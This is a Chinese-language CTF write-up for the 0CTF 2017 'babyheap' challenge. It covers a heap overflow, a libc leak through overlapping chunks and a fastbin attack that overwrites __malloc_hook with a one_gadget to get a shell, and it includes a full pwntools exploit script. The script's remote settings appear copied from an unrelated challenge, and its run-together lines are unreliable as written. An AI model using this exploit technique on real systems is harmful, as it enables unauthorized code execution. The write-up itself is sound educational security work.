0CTF-babyheap2017祥讲

解题思路

1. 查看文件信息，安全机制
2. IDA审计
3. 分析漏洞点
4. 编写EXP

1.基本信息

安全机制
安全机制全部开启了，其实不用慌，对我们做题影响不是很大

运行

2.IDA审计

1.Allocate

2.Fill

3.Free

4.Dump

4.1

3. 分析漏洞点

每次都是利用UAF漏洞来泄露堆的地址，第一次尝试利用这个方法去获取堆的地址（好像叫重叠堆）
漏洞点
1.Fill的size大小没有限制，可以覆盖到后面的chunk
2.在free的时候，不存在uaf漏洞
3.dump只能dump出本chunk的内容

思考漏洞点
先考虑怎么获取堆的地址:

这样就获取到smallbin的main_arena的地址

alloc(0x20)
alloc(0x20)
alloc(0x20)
alloc(0x20)
alloc(0x80)free(1)
free(2)payload  = p64(0)*5
payload += p64(0x31)
payload += p64(0)*5
payload += p64(0x31)    #通过修改index(2)的fd指针将small chunk的地址写进fastbin链表中
payload += p8(0xc0)
fill(0, payload)payload  = p64(0)*5
payload += p64(0x31)   #修改index(3),将index(4)的size位修改为和free chunk大小相同
fill(3, payload)alloc(0x20)  #将index(2)的chunk 申请走
alloc(0x20)   #将我们伪造的index(4) 大小为0x20 chunk，申请走payload  = p64(0)*5  #将伪造的chunk 还原回去
payload += p64(0x91)
fill(3, payload)alloc(0x80) #这理多申请一个small，在我们想要获取堆地址的时候，最好是两个以上的同一个chunk来泄露    index = 5
free(4)  #先free 为下面寻找0x70的chunk，做准备libc_base = u64(dump(2)[:8]) - 0x58-0x3c4b20   #0x3a5678
print ("---->") + hex(u64(dump(2)[:8]))

libc_base如何计算

hex(0x7ffff7dd1b20 - 0x7ffff7a0d000) = 0x3c4b20
0x58 就是main_arena 距离我们上图的距离0x58=88
vmmap

伪造chunk块，修改__malloc_hook

alloc(0x68)  #伪造chunk 在main_arena 里面找到一个合适的chunk大小  一般常用0x7f   index = 6
free(4)fill(2, p64(libc_base + 0x3c4aed))    #main_arena的伪造chunkl地址
print ("1-->") + hex(libc_base + 0x3c4aed)
alloc(0x60) #将index= 4的 chunk申请走，
alloc(0x60) #将index = 4的fd ，chunk分配，这里就是我们伪造的chunkpayload  = '\x00'*3
payload += p64(0)*2
payload += p64(libc_base + 0x4526a)
print ("2-->") + hex(libc_base + 0x4526a)
fill(6, payload)alloc(233) #这里已经将__malloc_hook，修改为onegadget ，只要调用了alloc就会获取shell
p.interactive()

bins

编写EXP

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
#context.log_level='debug'local = 1if local:p = process("./babyheap")#elf = ELF("./level3_x64")#libc = ELF("libc-2.19.so")
else:p=remote("pwn2.jarvisoj.com",9883)elf = ELF("./level3_x64")libc = ELF("libc-2.19.so")def alloc(size):p.sendline('1')p.sendlineafter(': ', str(size))p.recvuntil(': ', timeout=1)def fill(idx, data):p.sendline('2')p.sendlineafter(': ', str(idx))p.sendlineafter(': ', str(len(data)))p.sendafter(': ', data)p.recvuntil(': ')def free(idx):p.sendline('3')p.sendlineafter(': ', str(idx))p.recvuntil(': ')def dump(idx):p.sendline('4')p.sendlineafter(': ', str(idx))p.recvuntil(': \n')data = p.recvline()p.recvuntil(': ')return datap.recvuntil(': ')
alloc(0x20)
alloc(0x20)
alloc(0x20)
alloc(0x20)alloc(0x80)
free(1)
free(2)payload  = p64(0)*5
payload += p64(0x31)
payload += p64(0)*5
payload += p64(0x31)
payload += p8(0xc0)
fill(0, payload)payload  = p64(0)*5
payload += p64(0x31)
fill(3, payload)
#gdb.attach(p)
alloc(0x20)
alloc(0x20)   #chunk申请过来 payload  = p64(0)*5  #将伪造的chunk 还原回去
payload += p64(0x91)
fill(3, payload)alloc(0x80)
free(4)libc_base = u64(dump(2)[:8]) - 0x58-0x3c4b20   #0x3a5678
print ("---->") + hex(u64(dump(2)[:8]))
#gdb.attach(p)
log.info("main-arena: " + hex(u64(dump(2)[:8])-0x58))
log.info("libc_base: " + hex(libc_base))alloc(0x68)  #伪造chunk 在main_arena 里面找到一个合适的chunk大小  一般常用0x7f
free(4)pause()
fill(2, p64(libc_base + 0x3c4aed))print ("1-->") + hex(libc_base + 0x3c4aed)
alloc(0x60)
#gdb.attach(p)
alloc(0x60)
#gdb.attach(p)payload  = '\x00'*3
payload += p64(0)*2
payload += p64(libc_base + 0x4526a)
print ("2-->") + hex(libc_base + 0x4526a)
fill(6, payload)alloc(233)p.interactive()

后期在继续补充…

参考文献
：https://www.cnblogs.com/jazm/p/11184380.html
：https://bbs.pediy.com/thread-223461.htm